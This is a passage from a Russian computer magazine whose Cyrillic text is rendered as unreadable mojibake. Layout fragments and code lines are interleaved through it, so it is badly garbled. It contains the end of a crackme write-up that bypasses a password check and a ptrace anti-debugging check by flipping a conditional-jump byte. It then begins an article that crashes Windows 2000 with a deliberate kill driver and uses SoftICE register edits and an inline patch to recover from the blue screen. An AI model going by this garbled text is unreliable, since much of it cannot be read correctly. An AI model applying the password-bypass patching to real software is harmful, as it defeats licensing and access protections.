LOAD:002000B9 LOAD:002000B9 loc_2000B9: ; CODE XREF: start+C7?j LOAD:002000B9

mov ecx,offset aWrongPasswordS;"\n Wrong password, sorry"

Îòîðâàòü ìîé õâîñò! Åùå îäíà ïðîâåðêà è åùå îäèí óñëîâíûé ïåðåõîä, ðàñïîëîæåííûé ïî àäðåñó 2000B7h. Êàê âèäíî, îí àíàëèçèðóåò çíà÷åíèå, âîçâðàùåííîå ôóíêöèåé loc_2002C9, ñðàâíèâàÿ åãî ñ äâîéíûì ñëîâîì dword_200296, è åñëè loc_2002C9() ^ dword_200296 != 0, óñëîâíûé ïåðåõîä íå âûïîëíÿåòñÿ, è óïðàâëåíèå ïîëó÷àåò ïîäïðîãðàììà, âûâîäÿùàÿ ðóãàòåëüíîå ñîîáùåíèå íà ýêðàí. ×òî äåëàåò ôóíêöèÿ loc_2002C9? Äà êàêàÿ íàì ðàçíèöà! Ñóäÿ ïî âñåìó, çàíèìàåòñÿ ïðîâåðêîé öåëîñòíîñòè êîäà, êîòîðóþ íàì îáåùàë ñîçäàòåëü êðýêìèñà. ×òîáû åå îáåçâðåäèòü, ìû äîëæíû çàìåíèòü JZ íà JNZ, èíâåðòèðîâàâ ìëàäøèé áèò áàéòà, ðàñïîëîæåííîãî ïî àäðåñó 2000B7h. Âû÷èòàÿ áàçîâûé âèðòóàëüíûé àäðåñ ñåãìåíòà, ìû ïîëó÷èì ôèçè÷åñêîå ñìåùåíèå, ïî êîòîðîìó ýòîò áàéò ðàñïîëàãàåòñÿ â ELFôàéëå (â íàøåì ñëó÷àå îíî ðàâíî B7h), ãäå íàõîäèòñÿ áàéò 85h. Èíâåðòèðóåì ìëàäøèé áèò, ïðåâðàùàÿ åãî â 84h, ñ��õðàíÿåì èçìåíåíèÿ, âûõîäèì èç HTE, çàïóñêàåì timy-crackme. Êàê ýòî òàê îïÿòü íå çàïóñêàåòñÿ?! Âîò ÷òî çíà÷èò õà÷èòü âñëåïóþ! Âîçâðàùàåìñÿ ê íàøåìó ïåðâîìó óñëîâíîìó ïåðåõîäó 2000CFh è ïûòàåìñÿ ïðîàíàëèçèðîâàòü, ÷òî èìåííî îí ïðîâåðÿåò. Ìû âèäèì,

«ñêâîçíàÿ» ïðàâêà çàøèôðîâàííîãî êîäà â HTE áåç åãî ðàñøèôðîâêè

XÀÊÅÐ 01 /85/ 06

÷òî ñ âåðøèíû ñòåêà ñòÿãèâàåòñÿ äâîéíîå ñëîâî è ïðîâåðÿåòñÿ íà ðàâåíñòâî íóëþ. À êòî åãî òóäà ïîëîæèë?! Ïåðåõîäèì ïî ïåðåêðåñòíîé ññûëêå íàâåðõ è âèäèì, ÷òî â ñòðîêå 20009Ch íà âåðøèíó ñòåêà çàáðàñûâàåòñÿ ñîäåðæèìîå ðåãèñòðà EBX. Òî áûë áèêôîðäîâ øíóð, à ýòî — äèíàìèò LOAD:0020009C loc_20009C: ; CODE XREF: start:loc_200099?j LOAD:0020009C

push ebx ; ñîõðàíèòü ebx â ñòåêå

// À ÷åìó ðàâåí ñàì EBX? Îòâåò äàåò î÷åðåäíàÿ ïåðåêðåñòíàÿ ññûëêà, âåäóùàÿ íàñ ê ñëåäóþùåìó êîäó: LOAD:0020007B

mov edx,1

LOAD:00200080

int 80h ; Linux — sys_ptrace

LOAD:00200082

sub ebx,eax ; àíàëèç âîçâðàùåííîãî çíà÷åíèÿ

LOAD:00200084

test eax, eax ; îòëàä÷èê îáíàðóæåí?

LOAD:00200086

jz short loc_200099 ; îòëàä÷èêà íåò, âñå ÷èñòî

Âîò îíî! Ñèñòåìíûé âûçîâ sys_ptrace! Îêàçûâàåòñÿ, ÷òî íàø óñëîâíûé ïåðåõîä â ñòðîêå 2000CFh ïðîâåðÿë ñîâñåì íå ïàðîëü, à... íàëè÷èå îòëàä÷èêà (ïðîãðàììà, êîòîðàÿ óæå îòëàæèâàåòñÿ, íå ìîæåò âûçûâàòü ptrace. Ñêàçàííîå, ðàçóìååòñÿ, ðàñïðîñòðàíÿåòñÿ òîëüêî íà òå îòëàä÷èêè, ÷òî ðàáîòàþò ÷åðåç ptrace). Íî ýòî íå ñîâñåì òàê. Òî÷íåå, ñîâñåì íå òàê. Êàê òîëüêî îòëàä÷èê íàïàðûâàåòñÿ íà óñëîâíûé ïåðåõîä 200086h, íà ýêðàí âûâîäèòñÿ ðàçî÷àðîâûâàþùåå ñîîáùåíèå Sorry but the process seems to be trace («èçâèíèòå, íî ïðîöåññ, ïîõîæå, òðàññèðóåòñÿ»), è äî «íàøåãî» óñëîâíîãî ïåðåõîäà 2000CFh äåëî ïðîñòî íå äîõîäèò! Íà ñàìîì äåëå ñîçäàòåëü êðýêìèñà ïðèìåíèë äîâîëüíî õèòðûé òðþê. Óñëîâíûé ïåðåõîä 2000CFh íå êîíòðîëèðóåò íè ïðàâèëüíîñòü ïàðîëÿ, íè íàëè÷èå îòëàä÷èêà. Îí âñòàâëåí ïðîñòî êàê ïðèìàíêà. Ìèíà-ëîâóøêà. Êòî ïûòàåòñÿ åãî õàêíóòü, òîò âçðûâàåòñÿ. Òàêèì îáðàçîì, ÷òîáû âçëîìàòü ïðîãðàììó, íåîáõîäèìî èçìåíèòü âñåãî îäèí óñëîâíûé ïåðåõîä ïî àäðåñó 2000B7h. Óñëîâíûé ïåðåõîä 2000CFh òðîãàòü íå íóæíî! Ïîñêîëüêó ìû óæå òðîíóëè åãî, íàì íóæíî âåðíóòü âñå íà ìåñòî, çàìåíèâ õàêíóòîå 85h íà 84h. Ñîõðàíÿåì èçìåíåíèÿ ïî <F2> è âûõîäèì èç hex-ðåäàêòîðà. Äà! Ýòî ðàáîòàåò! Ó íàñ ïîëó÷èëîñü! Ïðîãðàììà âîñïðèíèìàåò ëþáûå ââîäèìûå ïàðîëè êàê ïðàâèëüíûå, âûâîäÿ ïîáåäîíîñíóþ íàäïèñü «Success! Congratulations» íà ýêðàí! ÇÀÊËÞ×ÅÍÈÅ Âîò ìû è õàêíóëè äàëåêî íå ñàìûé ïðîñòîé crackme ïîä Linux, ïðîäåìîíñòðèðîâàâ áàçîâîþ òåõíèêó âçëîìà. Êîíå÷íî, ýòî ãðÿçíûé âçëîì, òàêæå èìåíóåìûé bit-hack'îì, è òóò ñîâåðøåííî íå÷åì ãîðäèòüñÿ. Áîëåå àêêóðàòíûå õàêåðû àíàëèçèðóþò àëãîðèòì ïðîâåðêè ïàðîëÿ è ïèøóò êåéãåí, ãåíåðèðóþùèé ïîäõîäÿùèå ïàðîëè/ñåðèéíûå íîìåðà. Íî ýòî ñëîæíàÿ îïåðàöèÿ, êîòîðóþ òðóäíî èçëîæèòü â îäíîé ñòàòüå. BINARY YOUR’S z

âçëîì çàâåðøåí!

113


ÊÎÄÈÍÃ ASSEMBLER

TEXT ÊÐÈÑ ÊÀÑÏÅÐÑÊÈ & ÆÈÐÍÛÉ ÕÎÌßÊ

ÆÈÇÍÜ ÏÎÑËÅ BSOD Ñ ÏÎÌÎÙÜÞ ÎÒËÀÄ×ÈÊÀ È ÀÑÑÅÌÁËÅÐÀ ÇÀÑÒÀÂÈÌ ÑÈÑÒÅÌÓ ÏÅÐÅÆÈÒÜ ÃÎËÓÁÎÉ ÝÊÐÀÍ ÑÌÅÐÒÈ

ÂÑÅ ÏÐÅÊÐÀÑÍÎ ÇÍÀÞÒ, ×ÒÎ ÎÇÍÀ×ÀÅÒ BSOD (BLUE SCREEN OF DEATH). ÝÒÎ ÏÎÑËÅÄÍÈÉ ÂÇÄÎÕ ÎÏÅÐÀÖÈÎÍÍÎÉ ÑÈÑÒÅÌÛ, ÏÎÑËÅ ÊÎÒÎÐÎÃÎ ÎÍÀ ÑÁÐÀÑÛÂÀÅÒ ÄÀÌÏ È ÓÕÎÄÈÒ ÍÀ ÏÅÐÅÇÀÃÐÓÇÊÓ, ÒÅÐßß ÂÑÅ ÍÅÑÎÕÐÀÍÅÍÍÛÅ ÄÀÍÍÛÅ. ÎÄÍÀÊÎ ÍÀ ÑÀÌÎÌ ÄÅËÅ BSOD — ÅÙÅ ÍÅ ÊÎÍÅÖ, È ÅÑËÈ ÏÅÐÅÇÀÃÐÓÇÊÓ ÇÀÌÅÍÈÒÜ ÐÅÀÍÈÌÀÖÈÅÉ, ÒÎ Â 9 ÈÇ 10 ÑËÓ×ÀÅ ÌÎÆÍÎ ÂÎÇÂÐÀÒÈÒÜÑß Â ÍÎÐÌÀËÜÍÛÉ ÐÅÆÈÌ È ÓÑÏÅÒÜ ÇÀØÀÒÄÀÓÍÈÒÜ ÑÈÑÒÅÌÓ ÏÅÐÅÄ ÒÅÌ, ÊÀÊ ÎÍÀ ÓÌÐÅÒ ÎÊÎÍ×ÀÒÅËÜÍÎ

Ñèíèé ýêðàí ïîÿâëÿåòñÿ âñÿêèé ðàç, êîãäà ÿäðî âîçáóæäàåò íåîáðàáàòûâàåìîå èñêëþ÷åíèå (ñêàæåì, îáðàùåíèå ïî íóëåâîìó óêàçàòåëþ) èëè îòëàâëèâàåò çàâåäîìî ëåâóþ îïåðàöèþ (îñâîáîæäåíèå óæå îñâîáîæäåííîé ïàìÿòè, íàïðèìåð). Âî âñåõ ýòèõ ñëó÷àÿõ óïðàâëåíèå ïåðåäàåòñÿ ôóíêöèè KeBugCheckEx, îïèñàíèå êîòîðîé ìîæíî íàéòè â NT DDK. Îíà çàâåðøàåò ðàáîòó ñèñòåìû â àâàðèéíîì ðåæèìå, ïðè íåîáõîäèìîñòè ñáðàñûâàÿ äàìï ïàìÿòè, ïîêîâûðÿâøèñü â êîòîðîì, ìîæíî îïðåäåëèòü ïðè÷èíó ñáîÿ. Ôóíêöèÿ KeBugCheckEx ïðèíèìàåò ÷åòûðå àðãóìåíòà, âàæíåéøèì èç êîòîðûõ ÿâëÿåòñÿ BugCheckCode, îïðåäåëÿþùèé ïðè÷èíó ñáîÿ. Âñåãî ñóùåñòâóåò ñâûøå ñîòíè êîäîâ îøèáîê, äîêóìåíòèðîâàííûõ â DDK (èùè èõ â ðóêîâîäñòâå ïî îòëàä÷èêó Using Microsoft Debugger), îäíàêî â äåéñòâèòåëüíîñòè èõ íàìíîãî áîëüøå. Äèçàññåìáëèðîâàíèå ÿäðà W2K SP2 ïîêàçûâàåò, ÷òî KeBugCheckEx âûçûâàåòñÿ èç 387 ìåñò (ñ ðàçëè÷íûìè ïàðàìåòðàìè). Ðàçóìååòñÿ, íå âñå îøèáêè îäèíàêîâû ïî ñâîåé ôàòàëüíîñòè.  ìíîãîÿäåðíûõ îñÿõ ýòî âîîáùå íå ïðîáëåìà. Ïàäåíèå îäíîãî ÿäðà íå çàòðàãèâàåò äðóãèõ. Âñå ÿäðà ðàáîòàþò â ðàçäåëüíûõ àäðåñíûõ ïðîñòðàíñòâàõ è ÷àñòè÷íî èëè ïîëíîñòüþ èçîëèðîâàíû äðóã îò äðóãà. Ðàçðóøèòü òàêóþ ñèñòåìó î÷åíü òðóäíî, ìíîãîÿäåðíàÿ àðõèòåêòóðà ÷ðåçâû÷àéíî óñòîé÷èâà ê ñáîÿì, íî… êàê æå ïðè ýòîì îíà òîðìîçèò! Ìåæúÿäåðíûé îáìåí ñúåäàåò óéìó ïðîöåññîðíîãî âðåìåíè. Åñëè çàïèõàòü âñå êîìïîíåíòû â îäíî ÿäðî, òî ìû ïîëó÷èì ìîíîëèòíîå ÿäðî ïî òèïó Linux (÷òî, êñòàòè ãîâîðÿ, ÿâèëîñü ïðè÷èíîé ÿðîñòíîé êðèòèêè ïîñ-

114

ëåäíåãî ñî ñòîðîíû ìíîãèõ òåîðåòèêîâ).  Linux, êàê è â BSD, âñå êîìïîíåíòû ÿäðà (òàì îíè íàçûâàþòñÿ ìîäóëÿìè) èñïîëíÿþòñÿ â åäèíîì àäðåñíîì ïðîñòðàíñòâå, è íåêîððåêòíî íàïèñàííûé ìîäóëü ìîæåò íåïðåäíàìåðåííî èëè óìûøëåííî íàäðóãàòüñÿ íàä ÷óæîé ñîáñòâåííîñòüþ (ïðåâðàòèòü äàííûå â âèíåãðåò, íàïðèìåð). Ýòî ôàêò! Îäíàêî ïðè âîçíèêíîâåíèè íåîáðàáàòûâàåìîãî èñêëþ÷åíèÿ â ÿäðå, Linux ãðîõàåò òîëüêî òîò ìîäóëü, êîòîðûé ýòî èñêëþ÷åíèå è ïîðîäèë, íå òðîãàÿ âñå îñòàëüíûå. Àâàðèéíûé îñòàíîâ ñèñòåìû ïðîèñõîäèò òîëüêî ïî ñåðüåçíîìó ïîâîäó, êîãäà ðóøèòñÿ ÷òî-òî î÷åíü ôóíäàìåíòàëüíîå, äåëàþùåå äàëüíåéøóþ ðàáîòó ÿäðà äåéñòâèòåëüíî íåâîçìîæíîé. Êîíå÷íî, åñëè ïîëåòåë äðàéâåð æåñòêîãî äèñêà, — ýòî êðàíòû, íî âîò, íàïðèìåð, áåç äðàéâåðà çâóêîâîé êàðòû ìîæíî êàêîå-òî âðåìÿ è îáîéòèñü, ñîõðàíèâ âñå íåñîõðàíåííûå äàííûå, è òîëüêî ïîòîì ïåðåçàãðóçèòüñÿ. Îïåðàöèîííûå ñèñòåìû ñåìåéñòâà NT èñïîëüçóþò ãèáðèäíóþ àðõèòåêòóðó, ñî÷åòàþùóþ ñèëüíûå ñòîðîíû ìîíîëèòíûõ è ìèêðîÿäåð, ÷òî òåîðåòè÷åñêè äîëæíî îáåñïå÷èòü ïðåâîñõîäñòâî íàä ìîíîëèòíûì Linux'îì (êñòàòè ãîâîðÿ, ýêñïåðèìåíòàëüíîå ÿäðî GNU/HURD ïîñòðîåíî êàê ðàç ïî ìèêðîÿäåðíîé àðõèòåêòóðå). Ëåãåíäàðíî óñòîé÷èâóþ NT/XP, êîòîðóþ, êàê ãîâîðÿò, ìîæíî óðîíèòü òîëüêî âìåñòå ñ ñåðâåðîì, íà ñàìîì äåëå î÷åíü ëåãêî âîãíàòü â ãîëóáîé ýêðàí. Äîñòàòî÷íî ëþáîìó äðàéâåðó ñäåëàòü ÷òî-òî íåäîçâîëåííîå, êàê ñèñòåìà àâòîìàòè÷åñêè êàòàïóëüòèðóåò ïîëüçîâàòåëÿ. Õîðîøî, ÷òî Microsoft íå ñòðîèò àâèàëàéíåðû!

Åñëè áû ìîæíî áûëî ïåðåñåñòü íà HURD! Íî, óâû, ñîâìåñòèìîñòü íå äàåò. Âöåïèëàñü çóáàìè è íå ïóñêàåò! Äàëåêî íå êàæäûé ìîæåò áåçáîëåçíåííî îòêàçàòüñÿ îò ñâîåé ëþáèìîé NT. Òàê ÷òî íå áóäåì ñåòîâàòü íà íåèçáåæíîñòü ñóäüáû, à ëó÷øå âîçüìåì â ðóêè àññåìáëåð è ïîïûòàåìñÿ ÷òî-íèáóäü òàêîå íàïèñàòü. ×òîíèáóäü òàêîå, ÷òî ðåøèò âñå íàøè ïðîáëåìû (çàêîïàòü Áèëëà Ãåéòñà íà 640 Êá íèæå àñôàëüòà — íå ïðåäëàãàòü). ×ÅÌ ÌÛ ÁÓÄÅÌ ÇÀÍÈÌÀÒÜÑß Àâàðèéíî çàâåðøèòü ðàáîòó ñèñòåìû, âûáðîñèâ ñèíèé ýêðàí, — ñàìîå ïðîñòîå, ÷òî òîëüêî ìîæíî ñäåëàòü ïðè êðàõå ñèñòåìû. Microsoft íåñïðîñòà ïîøëà ïî ïóòè íàèìåíüøåãî ñîïðîòèâëåíèÿ. Ìû æå ïîêàæåì, êàê âûéòè èç ãîëóáîãî ýêðàíà â íîðìàëüíûé ðåæèì, ÷òîáû óñïåòü ñîõðàíèòü âñå äàííûå åùå äî òîãî, êàê ñèñòåìà ðóõíåò îêîí÷àòåëüíî. Ýòî äîâîëüíî ðèñêîâàííûé òðþê.  ñëó÷àå ïðîâàëà ìû ìîæåì ïîòåðÿòü âñå, äàæå íàø äèñêîâûé òîì, êîòîðûé ïîòîì ïðèäåòñÿ î÷åíü äîëãî âîññòàíàâëèâàòü.

Èíîãäà SoftICE îñòàíàâëèâàåòñÿ íå íà ïåðâîé êîìàíäå îáðàáîò÷èêà èñêëþ÷åíèé, à íåïîñðåäñòâåííî íà ìåñòå ñàìîãî ñáîÿ. Ïîä VM Ware ïåðâûé ðàç SoftICE 2.6 âñåãäà îñòàíàâëèâàåòñÿ â îáðàáîò÷èêå, à âî âñåõ ïîñëåäóþùèõ ñëó÷àÿõ — íà ìåñòå ñáîÿ. Ýôôåêò ñîõðàíÿåòñÿ âïëîòü äî ïåðåçàïóñêà VM Ware.

XÀÊÅÐ 01 /85/ 06


Ñíà÷àëà ìû ïðîäåìîíñòðèðóåì òåõíèêó ïðåîäîëåíèÿ ãîëóáîãî ýêðàíà, à çàòåì íàïèøåì ñïåöèàëüíûé äðàéâåð, êîòîðûé áóäåò ýòî äåëàòü àâòîìàòè÷åñêè. ×ÒÎ ÍÀÌ ÏÎÍÀÄÎÁÈÒÑß Âñå ýêñïåðèìåíòû ìû áóäåì ïðîâîäèòü íà äåâñòâåííîé Windows 2000, áåç óñòàíîâëåííûõ ïàêåòîâ îáíîâëåíèÿ (îñòàëüíûå ñèñòåìû âåäóò ñåáÿ òî÷íî òàê æå, îòëè÷àþòñÿ òîëüêî àäðåñà). ×òîáû íåíàðîêîì íå óãðîáèòü îñíîâíóþ ñèñòåìó, âñþ ðàáîòó ëó÷øå âñåãî âûïîëíÿòü íà ýìóëÿòîðå òèïà VM Ware, õîòÿ ýòî è íåîáÿçàòåëüíî. Åùå íàì ïîòðåáóåòñÿ SoftICE, NT DDK (eMule òåáå â ïîìîùü) è êîìïëåêò óòèëèò Ñâåíà Øðàéáåðà èç åãî êíèãè «Íåäîêóìåíòèðîâàííûå âîçìîæíîñòè Windows 2000», êîòîðûé ìîæíî áåñïëàòíî ñêà÷àòü ñ ñàéòà èçäàòåëüñòâà «Ïèòåð» èëè âîò òóò: http://irazin.ru/Downloads/ BookSamples/Schreiber.zip. Ïèâî è ñóøêè âûáèðàþòñÿ ïî âêóñó.

Áîëüøóþ êîëëåêöèþ ãîëóáûõ ýêðàíîâ ìîæíî íàéòè íà ñàéòå: http://www.dognoodle99.cjb.net/bsod/, ïîñëå ïðîñìîòðà êîòîðîãî ñòàíîâèòñÿ î÷åíü ãðóñòíî, òàê ãðóñòíî, ÷òî äàæå æèòü íå õî÷åòñÿ, äàæå ïîñëå BSOD.

Êîðî÷å, âàðèàíòîâ ìíîãî. Ïîïðîáóåì äëÿ íà÷àëà âîñïîëüçîâàòüñÿ ïåðâûì âàðèàíòîì. Ìû çíàåì, ÷òî â äàííîì ñëó÷àå àâàðèÿ ïðîèçîøëà èç-çà îøèáêè íàðóøåíèÿ äîñòóïà. Ñëåäîâàòåëüíî, ïðîöåññîð âîçáóäèë èñêëþ÷åíèå, çàáðîñèë íà âåðøèíó ñòåêà EIP/CS/FLAGS è ïåðåäàë óïðàâëåíèå îáðàáîò÷èêó èñêëþ÷åíèé, âíóòðè êîòîðîãî ìû ñåé÷àñ è íàõîäèìñÿ. Äàåì êîìàíäó "d esp" äëÿ îòîáðàæåíèÿ ñîäåðæèìîãî ñòåêà è âèäèì (äëÿ óäîáñòâà ðåêîìåíäóþ ïåðåêëþ÷èòü îêíî äàìïà â ðåæèì äâîéíûõ ñëîâ, âîñïîëüçîâàâøèñü êîìàíäîé "dd"): :d esp

ÏÐÅÎÄÎËÅÍÈÅ ÃÎËÓÁÎÃÎ ÝÊÐÀÍÀ Ñ ÏÎÌÎÙÜÞ SOFTICE Äîæäàâøèñü îêîí÷àíèÿ çàãðóçêè Windows 2000, ìû çàïóñêàåì äðàéâåð w2k_kill.sys, ïîçàèìñòâîâàííûé ó Øðàéáåðà, ñïåöèàëüíî ñïðîåêòèðîâàííûé òàê, ÷òîáû âûçûâàòü ãîëóáîé ýêðàí. Ðàçóìååòñÿ, èç êîìàíäíîé ñòðîêè ïðîñòî òàê äðàéâåð íå çàïóñòèøü! Áåç çàãðóç÷èêà òóò íèêàê íå îáîéòèñü (ìîæíî, êîíå÷íî, ïðîïèñàòü äðàéâåð â ðååñòðå, íî òîãäà ñèñòåìà áóäåò ïàäàòü ïðè êàæäîì çàïóñêå, ÷òî â îáùåì-òî íå âõîäèò â íàøè ïëàíû). Âîñïîëüçóåìñÿ äèíàìè÷��ñêèì çàãðóç÷èêîì w2k_load.exe, ðàçðàáîòàííûì âñå òåì æå Øðàéáåðîì: w2k_load.exe. NT ïîääåðæèâàåò äèíàìè÷åñêóþ çàãðóçêó äðàéâåðîâ, íî ãîòîâîé óòèëèòû â øòàòíûé êîìïëåêò ïîñòàâêè íå âõîäèò — âñå â äóõå Microsoft, à âîò â Linux ñ ýòèì ïðîáëåì íåò. Íàáèðàåì â êîìàíäíîé ñòðîêå "w2k_load.exe w2k_kill.sys", è ñèñòåìà óñïåøíî êëåèò ëàñòû è ïàäàåò â ñèíèé ýêðàí. Òàê ïðîèñõîäèò ïîòîìó, ÷òî â ïðîöåññå èíèöèàëèçàöèè äðàéâåðà-óáèéöû âûïîëíÿþòñÿ ñëåäóþùèå ñòðîêè, îáðàùàþùèåñÿ ê íóëåâîé ÿ÷åéêå ïàìÿòè, ÷òî ñòðîãî-íàñòðîãî çàïðåùåíî: ôðàãìåíò äðàéâåðà-óáèéöû, ïûòàþùèéñÿ ïðî÷èòàòü äâîéíîå ñëîâî ïî íóëåâîìó óêàçàòåëþ èç ðåæèìà ÿäðà

0010:F7443C88 BE67C000 00000008 00200202 804A4431

..g....... .1DJ.

0010:F7443C98 81116AD0 8649D000 BE8F1D08 BE8F1D08

.j....I.........

0010:F7443CA8 81480020 F7443D34 745FFFFF 83A49E60

.H.4=D..._t`...

Àäðåñ èíñòðóêöèè, âîçáóäèâøåé èñêëþ÷åíèå, ëåæèò â ïåðâîì äâîéíîì ñëîâå — BE67C000h (ó òåáÿ ýòî çíà÷åíèå íàâåðíÿêà áóäåò äðóãèì). Ñåëåêòîð CS èäåò ñëåäîì. Îí äîëæåí áûòü ðàâåí 08h. Òðåòüå äâîéíîå ñëîâî õðàíèò ñîäåðæèìîå ðåãèñòðà ôëàãîâ — EFLAGS. Òåïåðü ìû çíàåì ìåñòî ñáîÿ è ìîæåì âûâåñòè äèçàññåìáëåðíûé ëèñòèíã íà ýêðàí.  ýòîì íàì ïîìîæåò êîìàíäà "u *esp" (äèçàññåìáëèðîâàòü ñîäåðæèìîå ïàìÿòè ïî àäðåñó, êîòîðûé ñîäåðæèòñÿ â ðåãèñòðå esp) èëè "u be67c000": îïðåäåëåíèå ðåàëüíîãî ìåñòà ñáîÿ :u *esp 0023:BE67C000

MOV EAX,[00000000]

0023:BE67C005

RET 0008

0023:BE67C008

NOP

0023:BE67C009

NOP

0023:BE67C00A

NOP

PUNICODE_STRING pusRegistryPath)

0023:BE67C00B

NOP

return *((NTSTATUS *) 0);

Âîò îíà! Èíñòðóêöèÿ, âûçâàâøàÿ ñáîé! À äàâàé åå ïåðåïðûãíåì, ïðîäîëæèâ âûïîëíåíèå ñ RET 08h? Ñêàçàíî — ñäåëàíî. Íî äëÿ íà÷àëà íóæíî âûéòè èç îáðàáîò÷èêà èñêëþ÷åíèÿ. Äëÿ ýòîãî â SoftICE íåîáõîäèìî âûïîëíèòü ñëåäóþùèå êîìàíäû:

NTSTATUS DriverEntry (PDRIVER_OBJECT pDriverObject, { }

Íó è çà÷åì áûëî ðîíÿòü ñèñòåìó èç-çà òàêîé åðóíäû?! Êîìó íàø ñòðàøíûé óáèéöà ðåàëüíî ìåøàåò?! Âåäü öåëîñòíîñòü ñèñòåìû íè÷óòü íå ïîñòðàäàëà! Êàê îáúÿñíèòü ýòîé òóïîé NT, ÷òî â Áàãäàäå âñå ñïîêîéíî? Ïîðà áû âåðíóòüñÿ â user mode è ïðîäîëæèòü ðàáîòó â øòàòíîì ðåæèìå. Åñëè SoftICE áûë çàáëàãîâðåìåííî çàïóùåí, îí îòëîâèò ýòî èñêëþ÷åíèå è ïîêàæåò ñâîé ýêðàí, ïåðåäàâàÿ íàì âñå áðàçäû ïðàâëåíèÿ. Åñëè íàæàòü «x» (èëè <Ctrl-D>), òî íåìåäëåííî ïîñëå âûõîäà èç SoftICE âñïûõíåò ñèíèé ýêðàí, è ÷èíèòü òîãäà áóäåò óæå íå÷åãî. Íî ïîêà ìû íàõîäèìñÿ â îòëàä÷èêå åùå ìîæíî êîå-÷òî ïðåäïðèíÿòü. À ïðåäïðèíÿòü ìîæíî ñëåäóþùåå: 1 Îïðåäåëèòü ìåñòî ñáîÿ (îáðàùåíèå ïî íóëåâîìó óêàçàòåëþ), èñïðàâèòü ñèòóàöèþ (óñòàíîâèòü âàëèäíûé óêàçàòåëü), âðó÷íóþ âûéòè èç îáðàáîò÷èêà èñêëþ÷åíèÿ, âåðíóâ CS:EIP íà ïðåæíåå ìåñòî. Ñïîñîá õîðîøèé, íî, óâû, òðåáóþùèé îïðåäåëåííîãî èíòåëëåêòà, êîòîðîãî ó ìàøèíû íåò. 2 Çàöèêëèòü òåêóùèé ïîòîê, âîòêíóâ â ñâîáîäíîå ìåñòî jmp $, è âûéòè èç îòëàä÷èêà, ðàçðåøèâ ïðåðûâàíèÿ êîìàíäíîé r fl=I (åñëè îíè âäðóã áûëè çàïðåùåíû). Âñå áóäåò óæàñíî òîðìîçèòü, íî îñü ïðîäîëæèò ðàáîòàòü, è ìû ïî êðàéíåé ìåðå ñìîæåì êîððåêòíî çàâåðøèòü åå ðàáîòó. 3 Äîæäàòüñÿ âûçîâà ôóíêöèè KeBugCheckEx è ñðàçó æå âûéòè èç íåå, ïðîèãíîðèðîâàâ ñáîé è ïðîäîëæèâ íîðìàëüíîå âûïîëíåíèå. Ïðàâäà, íèêàêèõ ãàðàíòèé, ÷òî ñèñòåìà íå ðóõíåò îêîí÷àòåëüíî, ó íàñ íåò. 4 Ñïîñîá, ïðåäëîæåííûé ms-rem, äèêèé, íî èíîãäà ðàáîòàþùèé: îòäàòü êîìàíäû r eip=0/r cs=1B, ïåðåêëþ÷àþùèå ïðîöåññîð íà ïðèêëàäíîé ðåæèì.

XÀÊÅÐ 01 /85/ 06

1) r eip = *esp + sizeof(mov eax,[0]); // óñòàíàâëèâàåì ðåãèñòð EIP íà RET 2) r cs = *(esp + 4);

// óñòàíàâëèâàåì ñåëåêòîð CS (íåîáÿçàòåëüíî)

3) r FL = I;

// ðàçðåøàåì ïðåðûâàíèÿ;

4) r esp = esp + C

// ñíèìàåì ñî ñòåêà 3 äâîéíûõ ñëîâà

5) x

// âûõîäèì èç îòëàä÷èêà

Ïîñëå âûïîëíåíèÿ ýòîé ìàãè÷åñêîé ïîñëåäîâàòåëüíîñòè êîìàíä ñèñòåìà ïðîäîëæèò ñâîþ íîðìàëüíóþ ðàáîòó, è ñèíèé ýêðàí óæå íå ïîÿâèòñÿ. Ôàíòàñòèêà! Íåâåðîÿòíî! Ìû òîëüêî ÷òî èçáåæàëè ãèáåëè, êîòîðàÿ êàçàëàñü íåîòâðàòèìîé! Îäèí ìàëåíüêèé íþàíñ. Ìîÿ (è, âîçìîæíî, òâîÿ) âåðñèÿ SoftICE íå óìååò âîññòàíàâëèâàòü ðåãèñòð ESP â îáðàáîò÷èêå èñêëþ÷åíèÿ. Îòëàä÷èê èãíîðèðóåò êîìàíäó r esp=esp +C, íà ñàìîì äåëå òîëüêî èìèòèðóÿ åå âûïîëíåíèå! À ýòî çíà÷èò, ÷òî ñòåê îñòàåòñÿ íåñáàëàíñèðîâàííûì, è, íåñìîòðÿ íè íà êàêèå óñèëèÿ ìåäèêîâ, ñèñòåìà âñå-òàêè ãðîõàåòñÿ. Ïðèõîäèòñÿ õèòðèòü. Ìû âèäèì, ÷òî çà RET 08h ðàñïîëîæåíà äëèííàÿ öåïî÷êà NOP'îâ. À ÷òî åñëè âîòêíóòü ñþäà êîìàíäó "ADD ESP,0Ch", ÷òîáû ñòåê ñáàëàíñèðîâàë ñàì ïðîöåññîð? Ãîâîðèì îòëàä÷èêó 'A BE67C008' (àññåìáëèðîâàòü, íà÷èíàÿ ñ àäðåñà BE67C008) è ââîäèì ñëåäóþùåå: ADD ESP,0C<ENTER>JMP BE67C005 <ENTER> è åùå îäèí <ENTER> äëÿ çàâåðøåíèÿ ââîäà. Ïåðåóñòàíàâ-

115


ÊÎÄÈÍÃ ///// ISSUE ASSEMBLER

, . ÌÛØÜ ÍÅÌÍÎÃÎ ÒÎÐÌÎÇÈÒ Ò ÀÅ ÛÂ Ë ÑÏ Â Å Í ÆÅ Ó ÈÊ × Ä ÀÄ Ë ÒÈÉ ÐÀÇ ÎÒ ÒÐÅÒ Ó ÂÏÎËÍÅ ÐÅÀËÜÍÎ.. ÄÍÀÊÎ ÃÎÍßÒÜ ÅÅ ÏÎ ÊÎÂÐÈÊÓ ÎÄ ëèâàåì EIP íà íà÷àëî íàøåé çàïëàòêè (r eip = BE67C008) è âûõîäèì èç SoftICE. Íà ýòîò ðàç ó íàñ âñå ïîëó÷àåòñÿ! Âîò ïîñëåäîâàòåëüíîñòü êîìàíä ïî ðåàíèìàöèè ñèñòåìû. Íàïîìèíàþ, ÷òî îíà ïðèìåíèìà òîëüêî â ýòîì ñëó÷àå: ðåàíèìàöèÿ ñèñòåìû â óñëîâèÿõ, ïðèáëèæåííûõ ê áîåâûì u *esp r eip = *esp

